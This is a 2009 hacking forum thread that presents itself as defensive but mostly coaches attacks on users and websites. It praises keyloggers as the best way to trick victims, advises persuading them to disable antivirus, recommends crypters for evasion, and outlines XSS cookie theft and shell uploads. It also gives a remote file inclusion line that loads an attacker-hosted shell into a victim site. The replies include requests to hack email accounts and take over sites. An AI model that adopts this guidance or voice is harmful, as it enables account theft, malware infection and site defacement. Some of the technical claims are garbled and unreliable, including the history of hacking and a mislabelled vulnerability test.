Complete HACKING information

Discussion in 'Ethical hacking Tips' started by indiansword, Mar 11, 2009.

  1. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net

    Introduction:



    We see a millions of people going to different forums and websites and asking "how do i hack an email?", "Can you hack blah for me?". So thought to create a tutorial which will give you the basic idea about what the heck is a "HACK", and how to DEFEND YOUR SELF AGAINST HACKERS.

    Disclaimer:



    As i have seen controversies in the past, here is the disclaimer.

    I or the staff of Go4expert.com's does not take any responsibility if you use this tutorial in unethical way. This is written to help you to beware of whats going around, and save your self by not being hacked!

    Background:



    Hacking started way too far when the windowsd 98 was designed. Hacking is basically finding out the loop holes and trying leak some information out of it, which may lead you to get some critical information like passwords, credit card details. Sometimes hacking is done just because of the personal offesnses.

    Things to remember

    I will suggest you, KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THATS THE ONLY WAY YOU CAN LEARN.

    Initialization:



    Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically bifurcated in 2 major parts.

    1. Email or the user information
    2. Web based hacking.

    Email or user information:



    These days the most commonly used and famous way of hacking user information like Emails, Passwords, Credit card details are as follow:

    a. Phishing
    b. Brute Forcing
    c. Keylogging
    d. Trojans

    a. Phishing:
    Phishing is basically a massive attack. What a hacker does is, they created an absoulutely look alike page of some website like yahoo or gmail. They upload it to their own server. And give the link to any n00b user. When they open it, they think that they are on the yahoo or gmail page, they put in their username and password, click on submit and WHOA! your information has been submitted. This is widely used by new people trying to entering into ahcking world.
    Most recent example in india was some scam with ICICI bank, lots of user info was stolen as far as i remember. I read it somewhere in the news paper and was thinking what the hell! ?

    Disadvantages: Still many people give it a try before going for phishing, because the only problem in phishing is, even if the victim knows a little about internet, he will read the URL and understand that it is not a genuine website.
    b. Brute Forcing
    Brute forcer is basically a program which could be called as a "cracker". In brute focer you put the username you want to hack, and as a password you put a notepad file which has almost all of the existing english words in it. So what it does is, it will try each and every word from that file and see if anything matches. You might have noticed some topics like "huge pass list" on different forums, they are nothing but the password list to put into your bruteforcer.!

    Disadvantages:
    1. Sometimes brute forcing may just go for ages!
    2. It isnt guaranteed
    3. These days many people have alpha-numeric-symbol password which is real tough for brutefocer to detect
    4. Most of the famous sites like yahoo, gmail are designed in such a way that it will put the "image captcha" after 3 incorrect login attempts, which stops the bruteforcer.

    P.S:- I have made some focused FTP, Gmail & Yahoo bruteforcers which are avilable on my website.
    c. Keylogging
    Keylogger helps you to create a little filed which is known as "server". You gotta send your server to the victim. he has to click on it and then YOUR DONE! this is what happens.
    Best possible way to hack someone. Keyloggers are basically a program which will install themselves in your victim's computer and will keep on recording each and every keystroke pressed by the victim on his keyboard and it will send it to the hacker. There are many ways to receive the keystroke i.e. FTP, Email, Messengers. According to me this is the best way to trick your victim and get their information :D

    Disadvantages :
    1. When victim receives the keylogger, in most of the cases, their anti virus would auto delete them. So you have to convince them to desable the anti virus by bluffing something.
    2. Sometimes firewall blocks the keylogs from being sent.

    Tips :
    1. There are some programs which are known as "crypters" which will help you to make your server's undetectable. So your victim's anti-virus would not be able to detect them.
    d. Trojans:
    Trojans are like father of keyloggers. Trojan sends you the keylogs just as keyloggers, on top of that, it lets you take the control of victim's computer. Edit / delete/ upload / download files from or to their computer. Some more funny features like it will make their keyboard go mad, it may kep on ejecting and re-inserting the cd ROM. Much more..

    Disadvantages :
    Same as keyloggers.

    Tips :
    Same as keylogger.

    Web Hacking:



    I will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will help you to SAVE YOUR SITE!

    1. SQL Injection
    2. XSS
    3. Shells
    4. RFI
    5. There are some more but they are TOOO big to be discussed in here.

    1. SQL Injection:
    Most of the websites these days are connected to an SQL Database. Which helps them to store usernames and passwords [encrypted] when a guest registers to their website. SQL database processes a querie everytime a user logs in. It goes to the database, validates the password, if its correct then it logs in the user and if its not then it gives an error.
    So the basic funda is executing a command to parase a query in the database to try to exploit the internet information of the database. I cant really put the entire tutorial about because this is the most complicated way to hack the website! :)

    P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

    If your site's URL is:
    Code:
     yoursite.com/index.php?id=545
    just add a ' like this at the end
    Code:
     yoursite.com/index.php?id=545'
    2. XSS:
    XSS is another nice way to ahck some website. Suppose if some website/ forum is allowing HTML in the psot or articles, then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can login as that user and f*ck the website up.
    3. Shells:
    Shell is a malicious .php script. What you have to do is, find a palce in any website where you can upload any file like avatars, recepie, your tricks, your feedbacks. And you try to upload your shell files from there. And if its uploaded then WHOA!you open it from the URL bar and u can see the entire "FTP" account of that webhosting. YOu can rename/edit / upload/download anything u want including the index page.
    This is also known as deface.
    4. RFI:
    RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:
    Code:
     yoursite.com/shell.txt 
    and you found a vulnerable site to RFI... then you can do as follow:
    Code:
     victimssite.com/index.php?page=yousite.com/shell.txt
    This will again give u the access of your victim's sites FTP , just as shell so you can f*ck up anything you want.

    P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

    If your site's URL is:
    Code:
     yoursite.com/index.php?id=545
    just add something liek this at the end
    Code:
     yoursite.com/index.php?id=http://www.google.com
    And if it incldes the google page into your page, that means its vulnerable to RFI.
    ENJOY!
    eXCLUSIVELY BY ME!
     
  2. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    Yea, and video tutorials for "SHELLS" & "SQL Injection" is already posted, if you may wanna check them out
     
    Breley21 likes this.
  3. SMS campaign

    SMS campaign New Member

    Joined:
    Mar 13, 2009
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    any one have knwoladge how to get the hacking site.
     
  4. TriG0rZ

    TriG0rZ New Member

    Joined:
    Oct 2, 2008
    Messages:
    88
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    UK
    wow, thanks for the information man! well apriciated.
     
  5. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    thanks for reply, i was really sab that no one replied :D
     
  6. AymanEF

    AymanEF New Member

    Joined:
    Mar 23, 2009
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
    for bruteforcer can you do little more different like if u need to check a password for 8 digites and choose if the password is letters only or alpha-numeric

    so that the program generates his own list without putting a list on a notepad
     
  7. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    yea there is a php file for that, i dont have it right now, coz i m in the office, will post it as soon as i reach at home
     
    1 person likes this.
  8. uttampegu

    uttampegu New Member

    Joined:
    Dec 29, 2007
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    Occupation:
    IVRS Consultant
    Location:
    India
    Thanx for the info! Specially about the Keyloggers!
     
  9. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Article of the month competition nomination started here
     
  10. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
  11. thebestbuddy

    thebestbuddy New Member

    Joined:
    May 1, 2009
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    0
    hey i want to hack a hotmail account password ..can anyone tell me how to do it???send replies to thebestbuddy007@gmail.com
     
  12. mayjune

    mayjune New Member

    Joined:
    Jun 14, 2009
    Messages:
    814
    Likes Received:
    33
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    Pune,Delhi
    nice post, nice work...
     
  13. udefined

    udefined New Member

    Joined:
    Jul 12, 2009
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    0
    nah its better to use SQLinjector

    the most easy hack tool
     
  14. elitepirate

    elitepirate New Member

    Joined:
    Jul 16, 2009
    Messages:
    18
    Likes Received:
    0
    Trophy Points:
    0
    superb tut!!!

    where are the video tut's posted???

    im interested :p
     
  15. reddyschintuo

    reddyschintuo New Member

    Joined:
    Nov 29, 2008
    Messages:
    18
    Likes Received:
    1
    Trophy Points:
    0
    clear cut idea about hacking.worth read post
     
  16. dense

    dense New Member

    Joined:
    Aug 26, 2009
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    0
    im interested in grey hat hacking. i hav some really creative ideas but lack the recources to impliment them! ive watched every youtube tut on the subject & tried pretty much all above mentioned methods. ie sql, java inj, keyloggers & progs like poisen ivy & bi frost. i tried tamperdata. i registerd on hackthissite & completed variouse missions. i also tried kane & able to crack md5 hashes. none of these methods hav so far worked! i need to find a way to gain access to a website as admin!! its not that im lazy & cant be bothered to find out info. its just that none of the info ive been given is @all usefull. where can i find specific info on this subject that is effective ennough to actually be implimented in the real world?! ive wasted ennough time on this & ive been getting nowhere!!!!!!!!!! i need tutorials that work from scratch & go into specifics in a user friendly format that works step by step rather than using broad strokes. id rather find the information i was given was extremelyover simplified or even patronising as @ leat this reduces margin for error signifficantly. thx.
     
  17. mayjune

    mayjune New Member

    Joined:
    Jun 14, 2009
    Messages:
    814
    Likes Received:
    33
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    Pune,Delhi
    @dense
    hmm looks like you have gone tired too of the waste given on net as if its the most coolest way to hack...good...
    I guess only two poeple who can really help you out, hex0010 and indiansword...as they are quite good at all this...
    if you have anything specifc you are looking for, you can ask them for it i am sure they'll give you some idea how to go about it...
     
  18. dense

    dense New Member

    Joined:
    Aug 26, 2009
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    0
    this post is directed to either the great hex0010 or indiansword... or indeed anybody with any actual working knowledge of the specific procedures im going to mention here. first off a little more about me (& why it is important i have access to this information). i am sombody with very little experiance of hacking. infact im pretty crappy @ it but i am however a great conceptual artist. i have skills in grafiti bombing, im also a particularly dope dj & music producer so with the correct tools @ my disposal i would produce a standard of work that would be highly creative & origeonal. i dont just want to write "u got hacked" across sombodys page.... um no. what i ultimately do is mimic the design of the whole site but screw with it in a way that provokes thought & has genuine style. thus i dont want to just pick random websites really. id like to exploit sites belonging to organisations that exploit people! :) now on to what i need....
    i need a way into a website that gives me as much control as possible over content (ie the ability to post mp3 players & alter the background art or maybe even post a video or 2). i also need if poss to be able to lock the existing admin out of thier own site? the other thing i need is a software that allows me to gather information & gain control of a remotely operated pc? again i want to make the "experiance" for the victim as surreal & annoying as possible. so as much scope for creativity as possible would be apreciated! now bear in mind ive come accross software that claims to do this but i think 1 of the main problems i faced was that the tutorials were incomprehensive difficult to follow. wot i need is ennough information to ensure i can physiccally get it to work? thx.
     
  19. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    LOLed.



    After reading it, i understand that u have creativity. But that isnt all that u r supposed to have.
    1.First of all, Saying "i want to hack a site", doesnt give more information about it. You need to be more specific in terms of the type of the website, i.e. if its a forum,blog, customer made script, normal html etc etc...
    2. You asked "if i can kick out the admin from his own website". It is possible in terms of getting administrator previlages but that wudn't be permenent. Because admin can anytime login to his cpanel and remove the existing file, use the same database and restart the website.
    3. If we get access to cpanel and take it over... then he can contact hosting provider and get access back anytime.

    So u can takeover the website... but it also depends on the smartness of the actual admin... there is also a possibilty that he may try to track u back . If the web hosting provider is smart then wireshark can easily track u down and then u know govt.s are just waiting for someone to get caught to set an example.

    So my advise: if u dont know stuffs, better not try things in live enviroment. Install WAMP server on ur computer and try the things u know.
     
  20. divengrabber

    divengrabber New Member

    Joined:
    Aug 9, 2009
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    0
    cool thats very informative.
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice